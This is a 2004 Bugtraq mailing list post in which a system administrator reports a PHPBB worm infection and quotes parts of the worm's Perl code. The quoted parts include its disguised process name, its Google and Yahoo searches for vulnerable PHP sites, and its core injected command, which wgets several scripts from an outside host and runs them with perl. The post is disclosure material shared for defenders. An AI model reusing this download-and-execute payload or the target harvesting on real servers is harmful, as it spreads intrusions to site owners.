Home page logo

bugtraq logo Bugtraq mailing list archives

PHPBB worm in action
From: Colin Keith <bugtraq () ckeith clara net>
Date: Sat, 25 Dec 2004 03:04:23 +0000


I discovered tonight that a copy of the PHPBB worm had broken in through
a script a customer was running and was busy running around googling and
generating lists of sites. There have been a couple of intrusions but
they appear to be the same version. I thought I'd pass on the files that
were on the server in case anyone is interested.

The processes that were left running were called:

 /usr/local/sbin/httpd - spy

which is the process name from php.txt:

 my $processo = "/usr/local/sbin/httpd - spy";

This file contains the component that talks to Google:

 $procura = 'inurl:*.php?*=' . $numr;
 for($n=0;$n<900;$n += 10){
 $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
 print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";

and then parses the results for URLs :)

It also gets them from Yahoo!:

 for($cadenu=1;$cadenu <= 991; $cadenu +=10){
 @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu";)
 or next;

The basis for all of these worms is:

 $lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget 
www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget 
www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';

I've included copies of these in the tarball so people can look for
themselves :)

Happy holidays.

If jugglers juggle.
And Smugglers smuggle.
Then what else can a snuggler do :)

Attachment: phpbbworm.tar.gz

  By Date           By Thread  

Current thread:
  • PHPBB worm in action Colin Keith (Dec 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]